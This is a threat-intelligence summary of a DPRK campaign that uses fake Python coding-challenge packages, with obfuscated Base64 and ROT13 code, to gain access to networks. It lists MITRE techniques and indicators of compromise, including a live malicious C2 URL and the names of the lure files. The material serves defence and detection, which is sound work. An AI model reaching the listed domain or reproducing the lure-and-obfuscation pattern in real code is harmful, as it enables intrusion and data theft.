Threat Research

Code of Conduct: DPRK’s Python-Powered Breaches of Secure Networks — Elastic Security Labs

Securonix

The article analyzes DPRK-affiliated threat groups using social engineering and Python-based lures to gain initial access to secure networks, highlighting obfuscated Python code that can execute commands and exfiltrate data. It emphasizes continuous vigilance and user education to defend against evolving threats. #DPRK #CovertCatch #KandyKorn #RookeryCapital_PythonTest.zip #Pyperclip

Keypoints

  • The DPRK employs advanced social engineering tactics involving long-term persona development.
  • Python is used for its ease of obfuscation, extensive libraries, and ability to blend malicious activity with legitimate system use.
  • Python-based lures can execute system commands and exfiltrate data while remaining undetected.
  • Obfuscation techniques like Base64 and ROT13 are used to hide malicious functionality in seemingly innocent code.
  • Campaigns include samples like RookeryCapital_PythonTest.zip that masquerade as coding challenges to deliver malware.
  • Continuous education and user awareness are crucial to defend against these sophisticated attacks.

MITRE Techniques

  • [T1203] Remote Code Execution – Attackers use malicious Python scripts to execute commands remotely. “Attackers use malicious Python scripts to execute commands remotely.”
  • [T1027] Obfuscated Files or Information – Malicious code is obfuscated using Base64 and ROT13 to evade detection. “Malicious code is obfuscated using Base64 and ROT13 to evade detection.”
  • [T1071] Command and Control – Establishing communication with a remote server to execute further commands. “Establishing communication with a remote server to execute further commands.”
  • [T1059.006] Python – Using Python’s subprocess module to execute arbitrary commands on the victim’s machine. “Using Python’s subprocess module to execute arbitrary commands on the victim’s machine.”

Indicators of Compromise

  • [File] RookeryCapital_PythonTest.zip – sample distribution containing malicious Python content featuring PasswordManager.py and obfuscated code
  • [File] PasswordManager.py – part of the Python Challenge package with Pyperclip and Pyrebase modules
  • [Software] Pyperclip – used to handle clipboard operations in a suspicious, obfuscated context
  • [Software] Pyrebase – used alongside Pyperclip in the sample
  • [URL] https://akamaitechnologies.online – decoded from ROT13-encoded data and used to contact a malicious server
  • [Domain] google.com – checked in the encoded payload as a reference string

Read more: https://www.elastic.co/security-labs/dprk-code-of-conduct